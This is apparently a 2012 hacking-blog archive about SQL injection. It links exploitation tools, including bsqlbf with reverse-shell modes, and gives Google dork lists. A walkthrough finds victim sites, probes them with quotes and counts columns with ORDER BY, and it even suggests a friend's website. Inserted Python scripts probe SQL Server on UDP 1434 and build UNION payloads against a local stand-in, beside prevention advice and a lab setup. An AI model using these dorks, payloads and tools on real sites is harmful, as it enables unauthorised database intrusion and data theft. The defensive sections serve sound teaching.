Showing posts with label SQL injection. Show all posts
Wednesday, March 6, 2013
Tuesday, March 20, 2012
Safe3 SQL Injector – Automatic Detection & Exploitation Of SQL Injection Flaws
Safe3 SQL Injector is one of the most powerful penetration testing tools for automating the detection and exploitation of SQL injection flaws and the takeover of back-end database servers.
Features
- Full support for GET/POST/Cookie injection
- Full support for HTTP Basic, Digest, NTLM and certificate authentication
- Full support for MySQL, Oracle, PostgreSQL, MSSQL, Access, DB2, Sybase and SQLite
- Full support for error-based, union-based, blind and force SQL injection
- Support for file access, command execution, reverse IP/domain lookup, web path guessing, MD5 cracking, etc.
- WAF bypass
You can download Safe3 SQL Injector here:
Safe3SI.6.2.rar
sqlsus 0.7.1 Released – MySQL Injection & Takeover Tool
sqlsus is an open source MySQL injection and takeover tool, written in Perl. Via a command line interface, you can retrieve the database(s) structure, inject your own SQL queries, download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the database, and much more. Whenever relevant, sqlsus mimics MySQL console output.
- Added time-based blind injection support (added option “blind_sleep”, and renamed “string_to_match” to “blind_string”).
- It is now possible to force sqlsus to exit when it’s hanging (i.e.: retrieving data), by hitting Ctrl-C more than twice.
- Rewrite of “autoconf max_sendable”, so that sqlsus will properly detect which length restriction applies. (removed option “max_sendable”, added options “max_url_length” and “max_inj_length”)
- Uploading a file now sends it into chunks under the length restriction.
- sqlsus now saves variables after each command, so that forcing it to quit (or killing it) will not discard the changes that were made.
- Added a progress bar to inband mode, sqlsus now determines the number of rows to be returned prior to fetching them.
- get db (tables/columns) in inband mode now uses multithreading (like everything else).
- clone now uses count(*) if available (set by “get count” / “get db”), instead of using fetch-ahead.
- sqlsus now prints what configuration options are overridden (when a saved value differs from the configuration file).
You can download sqlsus 0.7.1 here:
sqlsus-0.7.1.tgz
The Mole – Automatic SQL Injection SQLi Exploitation Tool

The Mole is an automatic SQL injection exploitation tool. You only need to provide the vulnerable URL and a valid string that appears on the page; it then detects the injection and exploits it using the union technique or a boolean-query-based technique. It can be used to extract data from any site vulnerable to SQL injection.
Features
- Support for injections using MySQL, SQL Server, PostgreSQL and Oracle databases.
- Command line interface. Different commands trigger different actions.
- Developed in python 3.
- Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
- Auto-completion for commands, command arguments and database, table and columns names.
You can download it from here
Windows: themole-0.2.6-win32.zip
Linux: themole-0.2.6-lin-src.tar.gz
If you want to know how to use this tool then click here
Blind Cat: A Blind SQL Injection Exploitation Tool
Blind Cat is not a fully automated tool of the kind we call "one click ownage". You are the driving force behind this tool. Once you understand how it works, you will be able to exploit much more difficult SQL injections easily. Consider it an automation tool/front-end for manual blind SQL injection.
Sql Poizon ~ Sqli Exploit Scanner Tool
Sql Poizon includes lists of PHP, ASP, RFI and LFI dorks. Using these, you can search for vulnerable sites (for example, SQL-injectable sites), filter the results by country, test the candidate sites for SQL injection and browse them from within the tool.
You can download Sql Poizon here
Maxsqli syntax maker tool
This tool helps hackers and pen testers build SQL injection syntax, including the variants used for WAF bypass. You can see the tool in the snapshot above.
Download it from here
Saturday, February 25, 2012
Top 10 ways to exploit SQL Server Systems
Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.
1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.
Figure 1: Common SQL injection vulnerabilities found using WebInspect.
3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434 (the SQL Server Browser service in SQL Server 2005 and later), this service lets you find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v2.5 is a great tool for locating SQL Server systems and determining their version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default TCP port, because the resolution service reports the port each instance actually uses. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.
4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.
5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.
Figure 2: SQL Server vulnerability exploitable using Metasploit's MSFConsole.
6. SQL injection
SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, get commands executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector, shown in Figure 3.
Figure 3: SPI Dynamics' SQL Injector tool automates the SQL injection process.
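Item 3 only describes the resolution-service probe in outline. The script below, added here as an example and not part of the original article or of SQLPing, sends the single-byte CLNT_UCAST_EX request to UDP 1434 and parses the SVR_RESP answer, then lists the instances that are not on TCP 1433 (the ones a plain port scan misses). The sample reply, the host and instance names in it, and the function names are constructed for the demo; the wire layout is the one documented in MC-SQLR.

```python
import socket
import struct

SSRP_PORT = 1434
CLNT_UCAST_EX = b"\x03"   # "tell me about every instance on this host"
SVR_RESP = 0x05           # first byte of the server's reply

# Constructed sample reply in SVR_RESP layout: 0x05, little-endian 16-bit
# length, then ';'-separated key/value pairs, one instance per ';;' record.
# Host and instance names are made up for the demo.
SAMPLE_DATA = (
    b"ServerName;SQLHOST01;InstanceName;MSSQLSERVER;IsClustered;No;"
    b"Version;10.50.1600.1;tcp;1433;;"
    b"ServerName;SQLHOST01;InstanceName;SQLEXPRESS;IsClustered;No;"
    b"Version;11.0.2100.60;tcp;49172;"
    b"np;\\\\SQLHOST01\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;"
)
SAMPLE_RESPONSE = bytes([SVR_RESP]) + struct.pack("<H", len(SAMPLE_DATA)) + SAMPLE_DATA


def parse_ssrp_response(packet: bytes) -> list:
    """Split one SVR_RESP datagram into a list of per-instance dicts."""
    if len(packet) < 3 or packet[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP packet")
    (length,) = struct.unpack_from("<H", packet, 1)
    data = packet[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for record in data.split(";;"):
        if not record:
            continue
        fields = record.split(";")
        # key,value,key,value,...; a dangling odd field is ignored
        info = {fields[i]: fields[i + 1] for i in range(0, len(fields) - 1, 2)}
        instances.append(info)
    return instances


def hidden_instances(instances: list) -> list:
    """Instance names that do not listen on TCP 1433 (or have no TCP at all)."""
    return [i["InstanceName"] for i in instances if i.get("tcp") != "1433"]


def query_ssrp(host: str, timeout: float = 2.0) -> list:
    """Send CLNT_UCAST_EX to a live host and parse whatever comes back."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(CLNT_UCAST_EX, (host, SSRP_PORT))
        packet, _ = s.recvfrom(65535)
    return parse_ssrp_response(packet)


if __name__ == "__main__":
    # Offline run against the constructed reply; use query_ssrp("10.0.0.5")
    # against a real host you are authorised to test.
    for inst in parse_ssrp_response(SAMPLE_RESPONSE):
        print(f"{inst['ServerName']}\\{inst['InstanceName']} "
              f"version {inst['Version']} tcp={inst.get('tcp', '-')}")
    print("hidden:", hidden_instances(parse_ssrp_response(SAMPLE_RESPONSE)))
```

The same parser handles the broadcast form (send 0x02, CLNT_BCAST_EX, to the subnet broadcast address and collect one reply per host). Note that the reply is unauthenticated UDP, so a defender can reproduce this probe from any host on the segment to find instances that should have been firewalled.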
7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe, shown in Figure 4, comes in handy.
Figure 4: Absinthe takes the pain out of blind SQL injection testing.
8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.
9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.
10. Perusing Web site source code
Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
How to Find a vulnerable website?
Google is a hacker's best friend: candidate vulnerable websites can be found with Google searches, known as Google dorks.
Small List of Google Dork:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:post.php?id=
inurl:article?id=
Download A large list of Google dork
Copy one from the list above, paste it into the Google search box and hit enter.
You will see a list of URLs matching that pattern, for example:
http://www.victim.com/index.php?id=2
Go to that link.
Add a ' (single quote) at the end of the URL. For example:
http://www.victim.com/index.php?id=2'
Now hit enter.
If the page looks exactly the same, the parameter is probably not injectable (or errors are suppressed, which the blind injection posts cover).
If the page shows a database error or comes back blank, the quote broke the query and the site is likely vulnerable.
Now let's check further.
Remove the single quote from the URL.
Then append "order by x" (without the quotes),
replacing x with 1, 2, ..., n until the page shows an error.
For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5 (error)
Now you can conclude that the query behind the page returns 4 columns (ORDER BY 5 referenced a column that does not exist),
and that the parameter is injectable.
If the above method is not working,then try this:
http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5-- (error)
If this is also not working,then try this:
http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5-- (error)
Note:
If you want to test a particular website, such as www.yourfriendwebsite.com, go to that site and find a
page whose URL ends with one of the patterns in the dork list.
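The quote probe and the ORDER BY counting steps above, run end to end against a local stand-in for the vulnerable index.php, as an added example that is not part of the original post. It is Python over an in-memory SQLite table, so the table, its columns and the function names are constructed for the demo; ORDER BY past the last column and a UNION with the wrong column count both error on MySQL in the same way, which is what the procedure relies on.

```python
import sqlite3

# Constructed stand-in for the vulnerable site's database.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE articles(id INTEGER, title TEXT, body TEXT, author TEXT);
INSERT INTO articles VALUES (1, 'First', 'Hello', 'alice'),
                            (2, 'Second', 'World', 'bob');
""")


def index_php(id_param: str) -> str:
    """Models index.php?id=... : the parameter is concatenated into the SQL,
    exactly the bug the tutorial is hunting for (kept on purpose)."""
    sql = "SELECT id, title, body, author FROM articles WHERE id=" + id_param
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return "ERROR"          # the "error page"
    if not rows:
        return ""               # the "blank page"
    return " | ".join(str(r) for r in rows)


def quote_probe(page, base: str) -> bool:
    """Step 1: does appending a single quote change the response?"""
    return page(base) != page(base + "'")


def count_columns(page, base: str, suffix: str = "", limit: int = 50) -> int:
    """Steps 2-3: raise ORDER BY n until the page errors; the last n that
    worked is the number of columns the vulnerable SELECT returns.
    `suffix` lets you try the "--" variant, `base` the "and 1=2" variant."""
    for n in range(1, limit + 1):
        if page(f"{base} order by {n}{suffix}") == "ERROR":
            return n - 1
    raise RuntimeError("no error up to the limit; this parameter is probably not injectable")


def union_payload(base: str, ncols: int, expr: str) -> str:
    """Why the count matters: a UNION must supply exactly ncols columns,
    so `expr` goes in the first slot and the rest are padded with NULL."""
    cols = [expr] + ["NULL"] * (ncols - 1)
    return f"{base} and 1=2 union select {','.join(cols)}--"


if __name__ == "__main__":
    print("quote probe changes page:", quote_probe(index_php, "2"))
    n = count_columns(index_php, "2")
    print("columns returned by the query:", n)
    print("union result:", index_php(union_payload("2", n, "sqlite_version()")))
```

Running it prints that the quote probe changes the page, that the query returns 4 columns, and then the database version pulled through the first column of the UNION; try `count_columns(index_php, "2 and 1=2", "--")` to see the third variant from the post give the same answer.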
How to Prevent SQL Injection Vulnerability?
Hi webmasters and budding pen testers, I hope you read my article about SQL injection. Our aim is to provide security, right? So here are the prevention techniques.
Use Prepared Statements:
Use prepared statements, parameterized queries, or stored procedures. Don't use Dynamic SQL.
- In Java you can use PreparedStatement() with bind variables
- In .NET you can use parameterized queries, such as SqlCommand() or OleDbCommand() with bind variables
- In PHP you can use PDO with strongly typed parameterized queries (using bindParam()).
You can use Stored Procedures also. Unlike prepared statements, stored procedures are kept in the database. Both require first to define the SQL code, and then to pass parameters.
Use Less Privilege Account:
Use a low-privilege account for database connections. That account should not be able to drop or create tables. Maintain two separate accounts: one for the application's routine queries and one for administrative work.
Escape user input.
Escaping defeats many of the clever techniques intruders use. PHP provides an escape-string function for this (mysql_real_escape_string() for MySQL). The syntax is discussed in a later post.
Assume magic quotes is always off.
When magic_quotes_gpc is on, PHP escapes quotes in incoming request data, which stops some (but not all) SQL injection attacks. Magic quotes are not an ultimate defense and, what is worse, they are sometimes off without you knowing it. This is why your code must handle the substitution of quotes with slashes itself when they are off:
    $username = $_POST['username'];
    $password = $_POST['password'];
    if (!get_magic_quotes_gpc()) {
        $username = addslashes($username);
        $password = addslashes($password);
    }
If magic quotes are enabled, the following problems arise:
- Not all data supplied by the user is intended for insertion into a database. It may be rendered directly to the screen, stored in a session, or previewed before saving. This can result in backslashes being added where they are not wanted and being shown to the end user. This bug often creeps into even widely used software.[7]
- Not all data supplied by the user and used in a database query is obtained directly from sources protected by magic quotes. For instance, a user-supplied value might be inserted into a database (protected by magic quotes) and later retrieved from the database and used in a subsequent database operation. The latter use is not protected by magic quotes, and a naive programmer used to relying on them may be unaware of the need to protect it explicitly.
- Magic quotes use the generic functionality of PHP's addslashes() function, which is not Unicode aware and is still subject to SQL injection in some multi-byte character encodings. Database-specific functions such as mysql_real_escape_string() or, where possible, prepared queries with bound parameters are preferred.[8][9]
- While many DBMSs support escaping quotes with a backslash, the SQL standard actually calls for doubling the quote. Magic quotes offer no protection for databases not set up to support backslash escaping.
- Portability is an issue if an application is coded with the assumption that magic quotes are enabled and is then moved to a server where they are disabled, or the other way round.
- Adding magic quotes and subsequently removing them where appropriate incurs a small but unnecessary performance overhead.
- Magic quotes do not protect against other common vulnerabilities such as cross-site scripting or SMTP header injection.
Install patches regularly and promptly.
Even if your code has no SQL injection vulnerabilities, vulnerabilities in the database server, the operating system or the development tools you use are also a risk. This is why you should always install patches, especially those for SQL vulnerabilities, as soon as they become available.
Use automated test tools for SQL injections.
Even if you follow the advice above, some vulnerability may remain that you do not notice. So check your web application with a SQLi testing tool.
Try SQL inject Me tool to test the Vulnerability of your WebSite.
See, I just explained it theoretically, I didn't explain it with code. Don't worry, wait for my next post.
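To make the prepared-statement advice concrete, here is an added example (not code from the original post, and in Python with SQLite rather than the PHP/Java/.NET the post lists, so that it runs anywhere): the same login query written with string concatenation, with bound parameters, and with hand escaping, fed the classic `' OR 1=1 --` input. The users table, its credentials and the function names are constructed for the demo.

```python
import sqlite3

# Constructed sample user table for the demo.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users(name TEXT, password TEXT, role TEXT);
INSERT INTO users VALUES ('admin', 'hunter2', 'admin'), ('bob', 'secret', 'user');
""")


def login_dynamic_sql(username: str, password: str):
    """Vulnerable: the statement is built by concatenation, the
    "... WHERE name = '" + userName + "'" pattern the post warns about."""
    sql = ("SELECT name, role FROM users WHERE name = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def login_prepared(username: str, password: str):
    """Fixed: placeholders are bound as data, so the value can never
    change the structure of the statement (PDO/PreparedStatement do the same)."""
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def escape_sql_string(value: str) -> str:
    """The 'escape user input' fallback: double every quote, which is the
    SQL-standard way (addslashes-style backslashes are MySQL-specific)."""
    return value.replace("'", "''")


def login_escaped(username: str, password: str):
    """Concatenation again, but with every user value escaped first."""
    sql = ("SELECT name, role FROM users WHERE name = '" + escape_sql_string(username) +
           "' AND password = '" + escape_sql_string(password) + "'")
    return conn.execute(sql).fetchone()


if __name__ == "__main__":
    bypass = "' OR 1=1 --"
    print("dynamic SQL:", login_dynamic_sql(bypass, "x"))   # logs in as admin
    print("prepared   :", login_prepared(bypass, "x"))      # None
    print("escaped    :", login_escaped(bypass, "x"))       # None
```

With the bypass string the concatenated query becomes `WHERE name = '' OR 1=1 --' AND password = 'x'`, the comment swallows the password check and the first row (admin) is returned; the bound and escaped versions compare the whole string literally and find no such user. Prepared statements remain the primary defence because escaping must be applied correctly at every single concatenation point.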
SQL Inject Me -SQL Injection Tool to test the Vulnerability for Pen Testers
So far i have written what is sql Injection, How to prevent SQL Injection? . In this post, i am going to introduce a new SQLi tool for Pen Testers and Webmasters.
The tool name is SQL Inject Me.
What is SQL Inject Me?
SQL Inject Me is a Mozilla Firefox add-on used to test a web application for SQL injection vulnerabilities. It reduces the workload of manual SQL injection testing. It is designed for pen testers and webmasters, not for attackers.
Download it From here:
https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/
How does it work?
The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.
The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.
The tool does not attempt to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password cracking or firewall attack done by the tool.
UPDATE: Safe3 Sql Injector v8.6
Safe3 developers have brought us the updated Safe3 SQL Injector version 8.6. We discussed Safe3 SQL Injector in detail here.
This update fixes a lot of bugs.
Download Safe3 Sql Injector v8.6 (Safe3SI v8.6) here.
“Safe3 is one of the most powerful and easy usage penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.”
How does your Website becomes vulnerable to SQL Injection?
The developer is the one and only reason for SQL injection vulnerabilities: while building the web application, he fails to handle certain inputs safely, usually because he does not know about the problem. Don't be one of them. If you are a web application developer, you must understand the following techniques in order to avoid SQL injection vulnerabilities.
Reason 1:Incorrectly filtered escape characters
In this case, the developer fails to filter escape characters out of the input and passes it straight into the SQL statement, which creates the vulnerability. Consider this code:
statement = "SELECT * FROM `users` WHERE `name` = '" + userName + "';"
This code looks up the username in the database. An attacker can supply malicious input to inject his own query. For example, he can enter this instead of a username:
' or 1=1
so the SQL statement becomes:
SELECT * FROM `users` WHERE `name` = '' OR 1=1;
He can also use a comment to cut off the rest of the query, for example:
' or 1=1 --
so the query becomes:
SELECT * FROM `users` WHERE `name` = '' OR 1=1 -- ;
Here name = '' is false, but 1=1 is true. Because the two are joined with OR, it is enough for one condition to be true, so every row matches and the login is bypassed.
Reason 2:Incorrect Type Handling
When the developer fails to check the data type of the input, the database is exposed. Consider this query:
statement = "SELECT * FROM `userid` WHERE `id` = " + inputId + ";"
Here id is numeric, but inputId is concatenated in without any type check, so the attacker can supply any kind of data, including a string.
For example if he input as
1; drop table `userid`;
The query will become as
Select * from `userid` where `id`=1; drop table `userid`;
Reason 3: Blind SQL Injection (Conditional Response)
Blind SQL Injection is used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker.
The page with the vulnerability may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement called for that page.
This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information have been established.
Conditional responses
SELECT `booktitle` FROM `booklist` WHERE `bookId` = 'OOk14cd' AND '1'='1';
will result in a normal page, while
SELECT `booktitle` FROM `booklist` WHERE `bookId` = 'OOk14cd' AND '1'='2';
will likely give a different result if the page is vulnerable to SQL injection.
Using this, an attacker can find the column and full database details.
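The three reasons above, shown side by side in working code. This is an added example, not code from the original post: it uses Python's built-in sqlite3 module with a constructed in-memory users table, and the function names (vulnerable_lookup, safe_lookup, safe_lookup_by_id, rejects_id) are my own. The vulnerable function concatenates the input exactly as the post's first snippet does; the safe functions bind a parameter so the database never parses user input as SQL, and the id lookup enforces the integer type before the value reaches the query (Reason 2). The last loop shows that the fixed version also closes the conditional-response channel of Reason 3: it answers a true and a false injected condition identically.

```python
import sqlite3


def make_db():
    """Constructed in-memory demo database (not from the original post)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
    conn.executemany(
        "INSERT INTO users (name, pw_hash) VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b")],
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn, user_name):
    """Reason 1 as written in the post: the input is glued into the SQL text.

    Whatever the user types is parsed by the database as part of the query,
    so quotes, OR clauses and -- comments all change its meaning."""
    statement = "SELECT name FROM users WHERE name = '" + user_name + "'"
    return [row[0] for row in conn.execute(statement)]


def safe_lookup(conn, user_name):
    """Hardened form: a bound parameter. The SQL text is fixed and the value
    travels separately, so it can never be read as SQL."""
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (user_name,))
    return [row[0] for row in rows]


def safe_lookup_by_id(conn, input_id):
    """Reason 2 fix: enforce the numeric type before the value goes anywhere
    near the query, and still bind it rather than concatenating it."""
    try:
        user_id = int(str(input_id).strip())
    except ValueError:
        raise ValueError("id must be an integer, got %r" % (input_id,))
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


def rejects_id(conn, input_id):
    """True if safe_lookup_by_id refuses the value (used by the demo below)."""
    try:
        safe_lookup_by_id(conn, input_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # Login bypass from the post (Reason 1): every row comes back.
    print("vulnerable:", vulnerable_lookup(db, "' OR 1=1 --"))
    print("safe:      ", safe_lookup(db, "' OR 1=1 --"))
    # Reason 2: the stacked-statement input is rejected on type alone.
    print("rejected:  ", rejects_id(db, "1; drop table users"))
    # Reason 3: a true and a false injected condition are only
    # distinguishable against the vulnerable version.
    for probe in ("alice' AND '1'='1", "alice' AND '1'='2"):
        print(probe, "->", vulnerable_lookup(db, probe), safe_lookup(db, probe))
```

Note that sqlite3's execute() refuses stacked statements outright, so the "1; drop table" input of Reason 2 is shown being rejected by the type check rather than being run against a vulnerable concatenation; on drivers that do allow multiple statements the type check is the only thing standing between that input and the DROP.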
List of Online SQL Injection Scanner Websites
http://www.be007.gigfa.com/scanner/scanner.php
http://www.sunmagazin.com/tools/hack/SQLI-Scan
http://scanner.drie88.tk
http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan
http://wolfscps.com/gscanner.php
Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer
What is Blind SQL Injection: Some websites are vulnerable to SQL injection but the results of the injection are not visible to the attacker. In this situation, Blind SQL Injection is used. The page with the vulnerability may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.
There are plenty of automated Blind SQL Injection tools available. Here I am introducing one of them, named bsqlbf (expanded as Blind SQL Injection Brute Forcer).
This tool is written in Perl and allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections.
Supported Database:
- MS-SQL
- MySQL
- PostgreSQL
- Oracle
The tool supports 8 attack modes (-type switch):
Type 0: Blind SQL Injection based on true and false conditions returned by back-end server
Type 1: Blind SQL Injection based on true and error (e.g. syntax error) returned by back-end server.
Type 2: Blind SQL Injection in "order by" and "group by".
Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)
Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)
Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit
Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs
-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first
Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions
-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first
For Type 4(O.S code execution) the following methods are supported:
-stype: How you want to execute command:
SType 0 (default) is based on java..will NOT work against XE.
SType 1 is against oracle 9 with plsql_native_make_utility.
SType 2 is against oracle 10 with dbms_scheduler.
Disclaimer:
This Article is for Education purpose only. The above mentioned software is developed for Penetration testers to test their own Web application Vulnerability.
Ethical Hacking Lab to Test and Learn SQL injection, XSS, CSRF Vulnerability
Hi BTS readers, so far I have given the Web Application Pen Testing tutorials. Now it is time to practice your skills in a legal way. Last time, I explained the Damn Vulnerable Web Application (DVWA). This time I have come with a different web application that will develop your knowledge in Web App PenTesting.
The BodgeIt Store
Like DVWA, this is also a vulnerable web application that will help you develop your skills in pen testing. With this vulnerable application, you can practice the following attacks:
- Cross Site Scripting (XSS)
- SQL injection (SQLi)
- Hidden (but unprotected) content
- Cross Site Request Forgery
- Debug code
- Insecure Object References
- Application logic vulnerabilities
How to setup the Pen Testing Lab?
Requirements:
- BodgeIt app(download)
- Tomcat server
Step 1: Install Tomcat
Install Tomcat on your system. If you don't know how to install Tomcat, do a Google search.
Step 2: Start the server
Start the Tomcat server.
In Ubuntu, type the following command in a Terminal:
sudo /etc/init.d/tomcat6 start
For Windows users, just click the Tomcat server in All Programs.
Step 3:
Open the browser and type "localhost:8080". It will show a page saying "It works !". From there you can access the manager webapp (http://localhost:8080/manager/html) page. Clicking the link will ask you to enter a username and password; enter your computer username and password.
Step 4:
Now you are on the "Tomcat Web Application Manager" page. Scroll down and you will see the "WAR file to deploy" form.
Step 5: Deploying the WAR
Click the Browse button and select the bodgeit.WAR file. Now click the Deploy button.
Yes, now the application is successfully installed.
Access BodgeIt at this location: http://localhost:8080/bodgeit/
Enjoy! If you have any queries, please comment here.
Before we see what SQL Injection is, we should know what SQL and a database are.
Database:
A database is a collection of data. From a website's point of view, the database is used for storing user ids, passwords, web page details and more.
Some databases are:
* DB servers,
* MySQL (open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* PostgreSQL (open source),
* SQLite,
SQL:
Structured Query Language is known as SQL. In order to communicate with the database, we use SQL queries. We are querying the database, so it is called a query language.
Definition from Complete reference:
SQL is a tool for organizing, managing, and retrieving data stored by a computer database. The name "SQL" is an abbreviation for Structured Query Language. For historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation "S.Q.L." is also used. As the name implies, SQL is a computer language that you use to interact with a database. In fact, SQL works with one specific type of database, called a relational database.
Simple Basic Queries for SQL:
Select * from table_name :
This statement is used for showing the content of a table, including the column names.
For eg:
select * from users;
Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data into a table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");
I will give more details and queries in my next thread about SQL queries.
What is SQL Injection?
SQL injection is a common and famous method of hacking at present. Using this method, an unauthorized person can access the database of the website. The attacker can get all details from the database.
What an attacker can do?
* Bypassing logins
* Accessing secret data
* Modifying contents of the website
* Shutting down the MySQL server
Now let's dive into the real procedure for the SQL injection.
Follow my steps.
Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the vulnerable websites (hackable websites) using a Google Dork list. A google dork is a search for vulnerable websites using Google search tricks. There are lots of tricks to search in Google, but we are going to use the "inurl:" command for finding the vulnerable websites.
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
Here is the huge list of Google Dorks:
http://www.ziddu.com/download/13161874/A...t.zip.html
How to use?
Copy one of the above commands and paste it in the Google search box.
Hit enter.
You will get a list of web sites.
We have to visit the websites one by one to check for the vulnerability.
So start from the first website.
